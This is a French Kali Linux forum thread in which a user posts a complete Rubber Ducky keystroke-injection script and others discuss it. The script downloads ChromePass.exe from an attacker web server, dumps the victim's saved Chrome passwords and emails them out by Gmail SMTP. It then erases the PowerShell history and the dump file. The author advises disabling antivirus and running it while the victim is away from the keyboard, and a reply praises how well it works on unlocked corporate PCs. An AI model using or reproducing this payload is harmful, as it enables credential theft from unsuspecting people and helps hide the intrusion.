Le Forum francophone communautaire des utilisateurs de Kali linux

Tout le reste ici => Vrac => Discussion démarrée par: Frenchcore44 le 03 mars 2019 à 23:39:44

Titre: Rubber Ducky ChromePass Stealer
Posté par: Frenchcore44 le 03 mars 2019 à 23:39:44
Bonjour aujourd'hui je vais vous présentez un script pour Rubber ducky pour voler des mots passes de google chrome sous windows

Prérequis :

Une Rubber Ducky
ChromePass.exe (https://www.nirsoft.net/utils/chromepass.html)
Une Serveur web pour télécharger l’exécutable

GUI r
DELAY 300
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 1000
LEFT
ENTER
DELAY 1000
REM On se positionne dans un répertoire neutre
STRING cd %userprofile%
ENTER
REM On lance powershell
STRING powershell
ENTER
DELAY 1000
REM Variable contenant l'adresse de ChromePass
STRING $source = "http://apacheserveur/ChromePass.exe"
ENTER
REM Variable indiquant le nom de l’exécutable après téléchargement
STRING $destination = "pass.exe"
ENTER
REM Et on télécharge, délais de 5 sec a cause de ma co merde
STRING Invoke-WebRequest $source -OutFile $destination
ENTER
DELAY 5000
STRING start-process pass.exe
ENTER
DELAY 1000
REM On selectionne tout
CTRL a
REM On sauvegarde la selection
CTRL s
DELAY 2000
REM On donne un nom au fichier contenant les mdp
STRING pass.txt
ENTER
DELAY 100
REM On se déplace sur le champ du dossier où va être enregistré le fichier
ALT F4
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('expiditeuremail@gmail.com', 'motdepasse');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'expiditeuremail@gmail.com'
ENTER
STRING $ReportEmail.To.Add('emailreceveur@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'Chrome Password'
ENTER
STRING $ReportEmail.Body = 'ChromePWD'
ENTER
STRING $ReportEmail.Body = (Get-Content pass.txt | out-string)
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 15000
REM Autre moyen de supprimer l'historique Powershell
STRING Remove-Item (Get-PSReadlineOption).HistorySavePath
ENTER
DELAY 500
STRING exit
ENTER
DELAY 500
STRING del pass.txt

Aussi n'oublier activer  l'accès pour les applications moins sécurisées sur votre compte gmail qui va envoyer les mdp, Sinon vous allez rencontrez un problèmes

https://support.google.com/accounts/answer/6010255?hl=fr

Attention j'essayer avec quelque antivirus il y a certains qui bloque ChromePass.exe comme kaspersky du coup il faudras prévoir de suspendre la protection soit avec un script au début ou sois manuellement
Titre: Re : Rubber Ducky ChromePass Stealer
Posté par: Shakim le 04 mars 2019 à 10:19:22
Hello !
Merci pour le partage.

Je me demandais, vue que la clé simule un clavier, toutes les actions sont bien visibles a l’écran ? Cela prends combien de temps a peut prêt ?
Aussi, pendant toutes ces actions,  si l'utilisateur clique ou touche le clavier pendant la manip, cela casse la chaîne de commande ?
Titre: Re : Rubber Ducky ChromePass Stealer
Posté par: Snk le 04 mars 2019 à 10:31:17
Et là, il y a pleins de scripts utile: https://ducktoolkit.com/viewscript/all
Surtout "payload_generator" etc...
Tchao.
Titre: Re : Rubber Ducky ChromePass Stealer
Posté par: Frenchcore44 le 04 mars 2019 à 20:49:20
Salut, oui c'est visible a l’écran mais y a moyen de rendre la fenêtre plus petite avec quelque ligne en plus au début, pour savoir le temps que sa prend faut calculer tout les delay (1000= 1 seconde) , et oui si la cible clique sur un touche sa peut tout foirer logique, mais normalement quand tu fait ça c'est quand la victime est AFK, comme je  répétte j'ai pu l'occasion d'essayer ceci sur un autre machine wd 10, et aussi mes delay sont trop long car j'ai une mauvaise co, j'ai perdu bcp de temps lors de l'envoie du mail, et j'ai mit une bonne marge de delay
Titre: Re : Rubber Ducky ChromePass Stealer
Posté par: Shakim le 12 mars 2019 à 13:17:59
Merci pour le partage et pour toutes ces informations.
En effet c'est redoutablement efficace sur un pc qui n'a pas été verrouillé, surtout dans les entreprise qui ont désactivés les disques amovibles.